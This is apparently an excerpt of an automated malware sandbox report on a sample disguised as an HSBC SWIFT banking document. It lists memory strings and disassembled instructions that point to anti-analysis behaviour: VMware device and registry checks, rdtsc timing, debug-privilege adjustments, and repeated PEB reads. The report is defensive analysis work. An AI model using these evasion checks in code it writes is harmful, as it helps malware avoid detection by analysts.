          Source: explorer.exe, 0000001C.00000000.610554099.000000000600C000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
          Source: explorer.exe, 0000001C.00000003.562192486.000000000591C000.00000004.00000001.sdmp | Binary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
          Source: explorer.exe, 0000001C.00000003.562379103.00000000059B3000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: explorer.exe, 0000001C.00000003.562379103.00000000059B3000.00000004.00000001.sdmp | Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: explorer.exe, 0000001C.00000003.591114501.0000000010556000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
          Source: explorer.exe, 0000001C.00000003.602842153.000000001055A000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BF
          Source: explorer.exe, 0000001C.00000003.562119015.00000000058E8000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BZ
          Source: explorer.exe, 0000001C.00000000.610554099.000000000600C000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 0000001C.00000003.588792526.00000000059A3000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001C.00000003.601187918.0000000005A0B000.00000004.00000001.sdmp | Binary or memory string: e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&^
          Source: explorer.exe, 0000001C.00000003.562192486.000000000591C000.00000004.00000001.sdmp | Binary or memory string: 11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f563
          Source: explorer.exe, 0000001C.00000000.538460199.0000000000B3E000.00000004.00000020.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001C.00000003.604332920.0000000010433000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}iT
          Source: explorer.exe, 0000000A.00000000.396831901.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 0000001C.00000000.603288640.0000000000BEF000.00000004.00000020.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000000A.00000000.397006261.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_004088C0 rdtsc | 8_2_004088C0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018BC182 mov eax, dword ptr fs:[00000030h] | 8_2_018BC182
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018CA185 mov eax, dword ptr fs:[00000030h] | 8_2_018CA185
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018C2990 mov eax, dword ptr fs:[00000030h] | 8_2_018C2990
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018C61A0 mov eax, dword ptr fs:[00000030h] | 8_2_018C61A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018C61A0 mov eax, dword ptr fs:[00000030h] | 8_2_018C61A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_019151BE mov eax, dword ptr fs:[00000030h] | 8_2_019151BE
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_019151BE mov eax, dword ptr fs:[00000030h] | 8_2_019151BE
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_019151BE mov eax, dword ptr fs:[00000030h] | 8_2_019151BE
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_019151BE mov eax, dword ptr fs:[00000030h] | 8_2_019151BE
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_019549A4 mov eax, dword ptr fs:[00000030h] | 8_2_019549A4
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_019549A4 mov eax, dword ptr fs:[00000030h] | 8_2_019549A4
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_019549A4 mov eax, dword ptr fs:[00000030h] | 8_2_019549A4
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_019549A4 mov eax, dword ptr fs:[00000030h] | 8_2_019549A4
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_019169A6 mov eax, dword ptr fs:[00000030h] | 8_2_019169A6
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_0189B1E1 mov eax, dword ptr fs:[00000030h] | 8_2_0189B1E1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_0189B1E1 mov eax, dword ptr fs:[00000030h] | 8_2_0189B1E1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_0189B1E1 mov eax, dword ptr fs:[00000030h] | 8_2_0189B1E1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_019241E8 mov eax, dword ptr fs:[00000030h] | 8_2_019241E8
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_01899100 mov eax, dword ptr fs:[00000030h] | 8_2_01899100
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_01899100 mov eax, dword ptr fs:[00000030h] | 8_2_01899100
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_01899100 mov eax, dword ptr fs:[00000030h] | 8_2_01899100
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018B4120 mov eax, dword ptr fs:[00000030h] | 8_2_018B4120
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018B4120 mov eax, dword ptr fs:[00000030h] | 8_2_018B4120
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018B4120 mov eax, dword ptr fs:[00000030h] | 8_2_018B4120
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018B4120 mov eax, dword ptr fs:[00000030h] | 8_2_018B4120
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018B4120 mov ecx, dword ptr fs:[00000030h] | 8_2_018B4120
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018C513A mov eax, dword ptr fs:[00000030h] | 8_2_018C513A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018C513A mov eax, dword ptr fs:[00000030h] | 8_2_018C513A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018BB944 mov eax, dword ptr fs:[00000030h] | 8_2_018BB944
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018BB944 mov eax, dword ptr fs:[00000030h] | 8_2_018BB944
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_0189C962 mov eax, dword ptr fs:[00000030h] | 8_2_0189C962
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_0189B171 mov eax, dword ptr fs:[00000030h] | 8_2_0189B171
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_0189B171 mov eax, dword ptr fs:[00000030h] | 8_2_0189B171
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_01899080 mov eax, dword ptr fs:[00000030h] | 8_2_01899080
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_01913884 mov eax, dword ptr fs:[00000030h] | 8_2_01913884
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_01913884 mov eax, dword ptr fs:[00000030h] | 8_2_01913884
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018D90AF mov eax, dword ptr fs:[00000030h] | 8_2_018D90AF
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018C20A0 mov eax, dword ptr fs:[00000030h] | 8_2_018C20A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018C20A0 mov eax, dword ptr fs:[00000030h] | 8_2_018C20A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018C20A0 mov eax, dword ptr fs:[00000030h] | 8_2_018C20A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018C20A0 mov eax, dword ptr fs:[00000030h] | 8_2_018C20A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018C20A0 mov eax, dword ptr fs:[00000030h] | 8_2_018C20A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018C20A0 mov eax, dword ptr fs:[00000030h] | 8_2_018C20A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018CF0BF mov ecx, dword ptr fs:[00000030h] | 8_2_018CF0BF
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018CF0BF mov eax, dword ptr fs:[00000030h] | 8_2_018CF0BF
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018CF0BF mov eax, dword ptr fs:[00000030h] | 8_2_018CF0BF
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_0192B8D0 mov eax, dword ptr fs:[00000030h] | 8_2_0192B8D0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_0192B8D0 mov ecx, dword ptr fs:[00000030h] | 8_2_0192B8D0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_0192B8D0 mov eax, dword ptr fs:[00000030h] | 8_2_0192B8D0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_0192B8D0 mov eax, dword ptr fs:[00000030h] | 8_2_0192B8D0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_0192B8D0 mov eax, dword ptr fs:[00000030h] | 8_2_0192B8D0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_0192B8D0 mov eax, dword ptr fs:[00000030h] | 8_2_0192B8D0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018958EC mov eax, dword ptr fs:[00000030h] | 8_2_018958EC
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018940E1 mov eax, dword ptr fs:[00000030h] | 8_2_018940E1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018940E1 mov eax, dword ptr fs:[00000030h] | 8_2_018940E1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018940E1 mov eax, dword ptr fs:[00000030h] | 8_2_018940E1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_01964015 mov eax, dword ptr fs:[00000030h] | 8_2_01964015
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_01964015 mov eax, dword ptr fs:[00000030h] | 8_2_01964015
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_01917016 mov eax, dword ptr fs:[00000030h] | 8_2_01917016
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_01917016 mov eax, dword ptr fs:[00000030h] | 8_2_01917016
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_01917016 mov eax, dword ptr fs:[00000030h] | 8_2_01917016
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018AB02A mov eax, dword ptr fs:[00000030h] | 8_2_018AB02A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018AB02A mov eax, dword ptr fs:[00000030h] | 8_2_018AB02A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018AB02A mov eax, dword ptr fs:[00000030h] | 8_2_018AB02A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018AB02A mov eax, dword ptr fs:[00000030h] | 8_2_018AB02A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018C002D mov eax, dword ptr fs:[00000030h] | 8_2_018C002D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018C002D mov eax, dword ptr fs:[00000030h] | 8_2_018C002D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018C002D mov eax, dword ptr fs:[00000030h] | 8_2_018C002D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018C002D mov eax, dword ptr fs:[00000030h] | 8_2_018C002D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018C002D mov eax, dword ptr fs:[00000030h] | 8_2_018C002D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018BA830 mov eax, dword ptr fs:[00000030h] | 8_2_018BA830
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018BA830 mov eax, dword ptr fs:[00000030h] | 8_2_018BA830
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018BA830 mov eax, dword ptr fs:[00000030h] | 8_2_018BA830
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018BA830 mov eax, dword ptr fs:[00000030h] | 8_2_018BA830
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018B0050 mov eax, dword ptr fs:[00000030h] | 8_2_018B0050
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018B0050 mov eax, dword ptr fs:[00000030h] | 8_2_018B0050
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_01961074 mov eax, dword ptr fs:[00000030h] | 8_2_01961074
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_01952073 mov eax, dword ptr fs:[00000030h] | 8_2_01952073
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018A1B8F mov eax, dword ptr fs:[00000030h] | 8_2_018A1B8F
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A1B8F mov eax, dword ptr fs:[00000030h]8_2_018A1B8F
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0194D380 mov ecx, dword ptr fs:[00000030h]8_2_0194D380
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C2397 mov eax, dword ptr fs:[00000030h]8_2_018C2397
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CB390 mov eax, dword ptr fs:[00000030h]8_2_018CB390
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195138A mov eax, dword ptr fs:[00000030h]8_2_0195138A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C4BAD mov eax, dword ptr fs:[00000030h]8_2_018C4BAD
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C4BAD mov eax, dword ptr fs:[00000030h]8_2_018C4BAD
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C4BAD mov eax, dword ptr fs:[00000030h]8_2_018C4BAD
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01965BA5 mov eax, dword ptr fs:[00000030h]8_2_01965BA5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019153CA mov eax, dword ptr fs:[00000030h]8_2_019153CA
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019153CA mov eax, dword ptr fs:[00000030h]8_2_019153CA
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BDBE9 mov eax, dword ptr fs:[00000030h]8_2_018BDBE9
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C03E2 mov eax, dword ptr fs:[00000030h]8_2_018C03E2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C03E2 mov eax, dword ptr fs:[00000030h]8_2_018C03E2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C03E2 mov eax, dword ptr fs:[00000030h]8_2_018C03E2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C03E2 mov eax, dword ptr fs:[00000030h]8_2_018C03E2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C03E2 mov eax, dword ptr fs:[00000030h]8_2_018C03E2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C03E2 mov eax, dword ptr fs:[00000030h]8_2_018C03E2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195131B mov eax, dword ptr fs:[00000030h]8_2_0195131B
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189DB40 mov eax, dword ptr fs:[00000030h]8_2_0189DB40
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01968B58 mov eax, dword ptr fs:[00000030h]8_2_01968B58
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189F358 mov eax, dword ptr fs:[00000030h]8_2_0189F358
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189DB60 mov ecx, dword ptr fs:[00000030h]8_2_0189DB60
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C3B7A mov eax, dword ptr fs:[00000030h]8_2_018C3B7A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C3B7A mov eax, dword ptr fs:[00000030h]8_2_018C3B7A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CD294 mov eax, dword ptr fs:[00000030h]8_2_018CD294
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CD294 mov eax, dword ptr fs:[00000030h]8_2_018CD294
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018952A5 mov eax, dword ptr fs:[00000030h]8_2_018952A5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018952A5 mov eax, dword ptr fs:[00000030h]8_2_018952A5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018952A5 mov eax, dword ptr fs:[00000030h]8_2_018952A5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018952A5 mov eax, dword ptr fs:[00000030h]8_2_018952A5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018952A5 mov eax, dword ptr fs:[00000030h]8_2_018952A5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018AAAB0 mov eax, dword ptr fs:[00000030h]8_2_018AAAB0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018AAAB0 mov eax, dword ptr fs:[00000030h]8_2_018AAAB0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CFAB0 mov eax, dword ptr fs:[00000030h]8_2_018CFAB0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C2ACB mov eax, dword ptr fs:[00000030h]8_2_018C2ACB
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C2AE4 mov eax, dword ptr fs:[00000030h]8_2_018C2AE4
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A8A0A mov eax, dword ptr fs:[00000030h]8_2_018A8A0A
